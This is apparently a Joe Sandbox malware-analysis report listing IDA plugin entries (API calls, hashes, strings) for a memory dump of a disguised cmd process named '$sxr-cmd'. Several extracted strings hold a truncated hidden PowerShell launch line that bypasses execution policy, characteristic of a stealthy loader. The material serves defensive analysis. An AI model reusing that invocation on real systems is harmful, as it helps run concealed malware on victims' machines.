                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ$NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VOHZF($Lwtxx){$xCaUG=[System.Secu
                                                                                                            • API String ID: 0-4065707121
                                                                                                            • Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                                            • Instruction ID: 7704f55d04948e57bb06a3cd7ee0e9b7508db2ed126e087ec523da9662d49f1d
                                                                                                            • Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                                            • Instruction Fuzzy Hash: 7C51A024A0CE0386F794BF25A440279A7A8BF49B65FC04034C62E772A4DF3DA01CC370
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                                                                                            • String ID: 0123456789$C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VO
                                                                                                            • API String ID: 1606811317-1547122264
                                                                                                            • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                            • Instruction ID: 4cd2226dfbf97b36ac790705269bb31e163a12c788bb39a3c84630491c63359e
                                                                                                            • Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                            • Instruction Fuzzy Hash: 93D19121A08E4281E790AB15A884679F7A0FF49BB0FD54231DA6E337A5DF3DE41DC720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$ErrorLast$InformationVolume
                                                                                                            • String ID: %04X-%04X$~
                                                                                                            • API String ID: 2748242238-2468825380
                                                                                                            • Opcode ID: a5ce13b1ba1f32e436565888f02c3858eb1c7aaee3f3737ac5e2d6980773bf1f
                                                                                                            • Instruction ID: 420ccf5dcd1f3a927bc7b6f949e26f651bc8a293678dd680b1fdae5c9e3b3cde
                                                                                                            • Opcode Fuzzy Hash: a5ce13b1ba1f32e436565888f02c3858eb1c7aaee3f3737ac5e2d6980773bf1f
                                                                                                            • Instruction Fuzzy Hash: F7A1B672708FC2CAEBA5AF2098402E9B7A5FB85794F808134D94D6B748DF3DD659C720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                                                                                            • String ID: +-~!$APerformUnaryOperation: '%c'
                                                                                                            • API String ID: 2348642995-441775793
                                                                                                            • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                                            • Instruction ID: 9bcd74b0017ff77809c739a3fd2d783c2818cbbb38958aeea06e1c1faf29275e
                                                                                                            • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                                            • Instruction Fuzzy Hash: 41716D62D08E4686E7A06F25D490179F7A4FB49BB4FD4C039DA5E26294EF3CA48CC730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                                                                                                            • String ID: FAT$~
                                                                                                            • API String ID: 2238823677-1832570214
                                                                                                            • Opcode ID: 86a1f015c0a7fb555ea8968511af05af10d745c8640f90800e65605327948ca6
                                                                                                            • Instruction ID: 0fe7c303ab00a05f28ccb56a8cb5f0f96f32b3533ac4bbf97cf0c9e7954586d0
                                                                                                            • Opcode Fuzzy Hash: 86a1f015c0a7fb555ea8968511af05af10d745c8640f90800e65605327948ca6
                                                                                                            • Instruction Fuzzy Hash: 0F717F32608FC1C9EBA1AF2198902E9B7A4FB49794F844135DA4D6BA58DF3CD64DC720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000010,?,00000000,0000000E,00000025,00007FF7138251B2,00007FF7137EFE2A), ref: 00007FF7137ED884
                                                                                                            • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000010,?,00000000,0000000E,00000025,00007FF7138251B2,00007FF7137EFE2A), ref: 00007FF7137ED89D
                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000010,?,00000000,0000000E,00000025,00007FF7138251B2,00007FF7137EFE2A), ref: 00007FF7137ED94D
                                                                                                            • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000010,?,00000000,0000000E,00000025,00007FF7138251B2,00007FF7137EFE2A), ref: 00007FF7137ED964
                                                                                                            • _wcsnicmp.MSVCRT ref: 00007FF7137EDB89
                                                                                                            • wcstol.MSVCRT ref: 00007FF7137EDBDF
                                                                                                            • wcstol.MSVCRT ref: 00007FF7137EDC63
                                                                                                            • memmove.MSVCRT ref: 00007FF7137EDD33
                                                                                                            • memmove.MSVCRT ref: 00007FF7137EDE9A
                                                                                                            • longjmp.MSVCRT(?,?,?,?,?,?,?,?,00000000,00000010,?,00000000,0000000E,00000025,00007FF7138251B2,00007FF7137EFE2A), ref: 00007FF7137EDF1F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                                                                                                            • String ID:
                                                                                                            • API String ID: 1051989028-0
                                                                                                            • Opcode ID: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                                            • Instruction ID: 785a052ce1064a5ad02c26d42fe65cc95e984f2e59c2e00467091c1798379fe7
                                                                                                            • Opcode Fuzzy Hash: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                                            • Instruction Fuzzy Hash: 7B02A532A08F41C5EBA0AB18E480279F6A1FB48BA4F944231DA9D37794DF7DD45DC720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$_wcsicmp$AllocProcess
                                                                                                            • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                                                            • API String ID: 3223794493-3086019870
                                                                                                            • Opcode ID: cb3c41489134d7bf02aea1d2124d883155d35966149708651120c5f9a30c6a47
                                                                                                            • Instruction ID: 684f7dab331e2955500d41cb11ac0dfccf61c9359d40fc602d9623ee95c0e937
                                                                                                            • Opcode Fuzzy Hash: cb3c41489134d7bf02aea1d2124d883155d35966149708651120c5f9a30c6a47
                                                                                                            • Instruction Fuzzy Hash: 15518F21A08E42C9EB94AB15A450179FBA4FF4DB60F989235C95E233A0DF7DE45DC730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 00007FF7137F58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF71380C6DB), ref: 00007FF7137F58EF
                                                                                                              • Part of subcall function 00007FF7137F081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7137F084E
                                                                                                            • towupper.MSVCRT ref: 00007FF71380C1C9
                                                                                                            • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF71380C31C
                                                                                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF71380C5CB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                                                                                                            • String ID: %s $%s>$C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VO$PROMPT$Unknown$\$x
                                                                                                            • API String ID: 2242554020-3399287567
                                                                                                            • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                                            • Instruction ID: 8137b5115f7ac21cb2c252796db319f5654bfe357181687fd3a5408acf8075d6
                                                                                                            • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                                            • Instruction Fuzzy Hash: BB126121A18F4281EFA4AF15A44017AE6A0FF44BB0FD44235D96E2B7E0DE3EE559D730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                                                                            • String ID: \\.\
                                                                                                            • API String ID: 799470305-2900601889
                                                                                                            • Opcode ID: 5811be275bcc2b1884d73676e62e8c16ceee1b23a1cbd43db07b10be63971868
                                                                                                            • Instruction ID: 2112f589ed22c5a2d0206a39ba14b8e663e9a0dfeb8ad79a079912547beaba27
                                                                                                            • Opcode Fuzzy Hash: 5811be275bcc2b1884d73676e62e8c16ceee1b23a1cbd43db07b10be63971868
                                                                                                            • Instruction Fuzzy Hash: 8151A832A08EC285EBA0AF11D8802B9F7A8FB89BA4F854535D91D57794DF3CD54D8720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                                                                                            • String ID:
                                                                                                            • API String ID: 1944892715-0
                                                                                                            • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                            • Instruction ID: 0eb9da6572477042c45a3c956b80496c37c2c0dfd9cd1bae5a7351810b8d8de1
                                                                                                            • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                            • Instruction Fuzzy Hash: 8BB17221A09E4296EBE0BF11A490179EAA5BF4DBA0F848135CA5E77390DF7DE44CC730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 00007FF7137F3578: _get_osfhandle.MSVCRT ref: 00007FF7137F3584
                                                                                                              • Part of subcall function 00007FF7137F3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F359C
                                                                                                              • Part of subcall function 00007FF7137F3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F35C3
                                                                                                              • Part of subcall function 00007FF7137F3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F35D9
                                                                                                              • Part of subcall function 00007FF7137F3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F35ED
                                                                                                              • Part of subcall function 00007FF7137F3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F3602
                                                                                                            • _get_osfhandle.MSVCRT ref: 00007FF7137E54DE
                                                                                                            • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF7137E1F7D), ref: 00007FF7137E552B
                                                                                                            • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF7137E1F7D), ref: 00007FF7137E554F
                                                                                                            • _get_osfhandle.MSVCRT ref: 00007FF71380345F
                                                                                                            • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7137E1F7D), ref: 00007FF71380347E
                                                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7137E1F7D), ref: 00007FF7138034C3
                                                                                                            • _get_osfhandle.MSVCRT ref: 00007FF7138034DB
                                                                                                            • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7137E1F7D), ref: 00007FF7138034FA
                                                                                                              • Part of subcall function 00007FF7137F36EC: _get_osfhandle.MSVCRT ref: 00007FF7137F3715
                                                                                                              • Part of subcall function 00007FF7137F36EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7137F3770
                                                                                                              • Part of subcall function 00007FF7137F36EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7137F3791
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                                                                                            • String ID:
                                                                                                            • API String ID: 1356649289-0
                                                                                                            • Opcode ID: 8cb344cfa4787b055339b8a9ee12bbc5c0a371722c2d9f6503a0875dc2cc5f96
                                                                                                            • Instruction ID: ced070693369209c6f25d379cf3f5016e7c39627d4c01fbb06519aebc706c1ab
                                                                                                            • Opcode Fuzzy Hash: 8cb344cfa4787b055339b8a9ee12bbc5c0a371722c2d9f6503a0875dc2cc5f96
                                                                                                            • Instruction Fuzzy Hash: 4B919332A08F42CBE794AF15A44017AF6E5FB88BA0F844135DA5E677A0DF7DD458CB20
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LocalTime$ErrorLast_get_osfhandle
                                                                                                            • String ID: %s$/-.$:
                                                                                                            • API String ID: 1644023181-879152773
                                                                                                            • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                                            • Instruction ID: 39eaa79eaa289f2585c5334814124636ab579e618aa97a607cf9a16dd42a8337
                                                                                                            • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                                            • Instruction Fuzzy Hash: B491A222A28E4285FF90BB14D4402B9EAE0FF44BA4FD44135D94E6A6D4DE3EE59DC331
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF713807251), ref: 00007FF71380628E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
